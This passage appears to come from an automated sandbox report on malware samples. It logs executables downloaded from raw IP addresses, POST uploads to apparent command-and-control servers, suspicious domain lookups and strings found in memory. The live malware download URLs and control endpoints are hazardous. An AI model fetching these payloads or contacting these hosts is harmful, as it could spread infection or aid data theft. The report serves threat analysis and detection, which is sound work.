Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=oVu0E9qEE3l6igEmGLJahzIyOc76s9q8jI5.nj__y8Q-1729256686-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8789Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=LAlU2jiP0ih1GCQ2tR8pCO9umtnkgr__mMhgdSGI1E8-1729256669-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=oVu0E9qEE3l6igEmGLJahzIyOc76s9q8jI5.nj__y8Q-1729256686-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20442Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=oVu0E9qEE3l6igEmGLJahzIyOc76s9q8jI5.nj__y8Q-1729256686-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1279Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=oVu0E9qEE3l6igEmGLJahzIyOc76s9q8jI5.nj__y8Q-1729256686-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 561980Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=oVu0E9qEE3l6igEmGLJahzIyOc76s9q8jI5.nj__y8Q-1729256686-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A5BE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 6_2_00A5BE30
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103If-Modified-Since: Fri, 18 Oct 2024 12:50:16 GMTIf-None-Match: "1cb800-624bfbeaba684"
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.103If-Modified-Since: Fri, 18 Oct 2024 12:50:09 GMTIf-None-Match: "2d8200-624bfbe479d49"
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.103
Source: ea2c7beae0.exe, 00000007.00000002.2464806930.0000000001083000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: //www.gstatic.com/recaptcha/ https://www.youtube.com/ ht equals www.youtube.com (Youtube)
Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: ea2c7beae0.exe, 00000007.00000003.2443701449.0000000001084000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd883ccb3237fa39d2837163d0f38217b; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=b06620d34975df90cb4ac790; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type34508Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveFri, 18 Oct 2024 13:04:14 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd883ccb3237fa39d2837163d0f38217b; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=e22be341ffae5048276ae28b; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25258Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveFri, 18 Oct 2024 13:04:37 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: ea2c7beae0.exe, 00000007.00000002.2464806930.0000000001083000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s://www.youtube.B equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: clearancek.site
Source: global traffic DNS traffic detected: DNS query: mobbipenju.store
Source: global traffic DNS traffic detected: DNS query: eaglepawnoy.store
Source: global traffic DNS traffic detected: DNS query: dissapoiznw.store
Source: global traffic DNS traffic detected: DNS query: studennotediw.store
Source: global traffic DNS traffic detected: DNS query: bathdoomgaz.store
Source: global traffic DNS traffic detected: DNS query: spirittunek.store
Source: global traffic DNS traffic detected: DNS query: licendfilteo.site
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: sergei-esenin.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 18 Oct 2024 13:04:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bEtFHJAqb1J3Ot98KL%2Fqoqp4JoFHK5uNhw7vjnCOZ%2Fc6ZWqAfDxVFQAOGi2LaAFVoGExOFm%2FibYw9s8PlhiSk1m2IrMgq%2F4QSt2oSw634D9X7v3Hhnvex%2FmAgVxbkRf91XbOjg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d48bbb1fd266b77-DFW
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 18 Oct 2024 13:04:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e5lBCMPs%2Flow7FW5CY7FT9uN0ldwZWIIb8ht%2FunKx2EKGy2UqXWBVzUwQdaMfElMdVGNfvgc6hA3qJrY89B6N8gIPL%2BsD9wIfpjmgJ0qFarrTc5yxPdfqtetOqJ740khjRn5Fg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d48bc06afd82fd0-DFW
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 18 Oct 2024 13:04:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oNSBwyj3862PKaCNDvzaVv5wdgeVM4qISTqaodKW9ZEfMIg26%2Fp7tFAnJmKxE%2F1fhak18WhGjnw9nVmZ7%2BNgBQNehUrbKJKOwXwubiSmdXCSu1zcnb%2FbTBtAefmDDU4ZJnP4Lw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d48bc759d296b0d-DFW
Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: ea2c7beae0.exe, 00000010.00000002.2932095339.0000000005350000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000002.2920844203.0000000000853000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/
Source: skotes.exe, 00000006.00000002.2921573681.000000000144E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/luma/random.exe
Source: skotes.exe, 00000006.00000002.2921573681.000000000144E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/luma/random.exe1395
Source: skotes.exe, 00000006.00000002.2921573681.000000000144E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/luma/random.exeY
Source: skotes.exe, 00000006.00000002.2921573681.000000000144E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/luma/random.exep2
Source: skotes.exe, 00000006.00000002.2921573681.000000000144E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/luma/random.exes
Source: ea2c7beae0.exe, 0000000B.00000003.2864940536.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000002.2920844203.0000000000853000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/mine/random.exe
Source: ea2c7beae0.exe, 00000010.00000002.2920844203.0000000000853000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/mine/random.exeP
Source: skotes.exe, 00000006.00000002.2921573681.0000000001479000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/off/random.exe
Source: skotes.exe, 00000006.00000002.2921573681.0000000001479000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2866675678.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2864940536.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2866246791.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000002.2919863056.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000002.2920844203.0000000000853000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/steam/random.exe
Source: ea2c7beae0.exe, 0000000B.00000003.2866675678.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2866246791.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/steam/random.exe#
Source: ea2c7beae0.exe, 00000010.00000002.2919623913.00000000003EA000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/steam/random.exe0
Source: skotes.exe, 00000006.00000002.2921573681.0000000001479000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/steam/random.exeH=V
Source: ea2c7beae0.exe, 0000000B.00000003.2864940536.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/steam/random.exeI
Source: skotes.exe, 00000006.00000002.2921573681.0000000001479000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/steam/random.exeV;
Source: ea2c7beae0.exe, 00000010.00000002.2919863056.00000000007DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/steam/random.exel%
Source: ea2c7beae0.exe, 0000000B.00000003.2864940536.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000002.2920844203.0000000000853000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/well/random.exe
Source: ea2c7beae0.exe, 00000010.00000002.2920844203.0000000000853000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/well/random.exev
Source: ea2c7beae0.exe, 00000010.00000002.2919863056.00000000007A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103:80/steam/random.exe
Source: skotes.exe, 00000006.00000002.2921573681.0000000001479000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/test/num.exe
Source: 6a8d4317d4.exe, 00000008.00000002.2537460651.000000000095E000.00000004.00000020.00020000.00000000.sdmp, 6a8d4317d4.exe, 0000000E.00000002.2695281635.000000000094B000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000000F.00000002.2731328670.00000000011EE000.00000004.00000020.00020000.00000000.sdmp, 6a8d4317d4.exe, 00000011.00000002.2867421028.000000000162B000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000013.00000002.2904376187.0000000000C47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37
Source: num.exe, 0000000F.00000002.2731328670.0000000001234000.00000004.00000020.00020000.00000000.sdmp, 6a8d4317d4.exe, 00000011.00000002.2867421028.0000000001685000.00000004.00000020.00020000.00000000.sdmp, 6a8d4317d4.exe, 00000011.00000002.2867421028.000000000162B000.00000004.00000020.00020000.00000000.sdmp, 6a8d4317d4.exe, 00000011.00000002.2867421028.0000000001698000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000013.00000002.2904376187.0000000000C88000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000013.00000002.2904376187.0000000000C47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/
Source: num.exe, 00000013.00000002.2904376187.0000000000C88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/$
Source: 6a8d4317d4.exe, 00000008.00000002.2537460651.00000000009B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/L
Source: num.exe, 0000000F.00000002.2731328670.0000000001230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/Local
Source: num.exe, 0000000F.00000002.2731328670.00000000011EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/M
Source: 6a8d4317d4.exe, 0000000E.00000002.2695281635.000000000094B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/S
Source: 6a8d4317d4.exe, 00000011.00000002.2867421028.000000000167E000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000013.00000002.2904376187.0000000000C88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/ata
Source: 6a8d4317d4.exe, 00000011.00000002.2867421028.0000000001685000.00000004.00000020.00020000.00000000.sdmp, 6a8d4317d4.exe, 00000011.00000002.2867421028.000000000162B000.00000004.00000020.00020000.00000000.sdmp, 6a8d4317d4.exe, 00000011.00000002.2867421028.0000000001698000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000013.00000002.2904376187.0000000000C88000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000013.00000002.2904376187.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000013.00000002.2904376187.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: 6a8d4317d4.exe, 0000000E.00000002.2695281635.000000000099D000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000000F.00000002.2731328670.000000000124F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php%
Source: 6a8d4317d4.exe, 0000000E.00000002.2695281635.000000000099D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php/
Source: num.exe, 00000013.00000002.2904376187.0000000000C88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php7
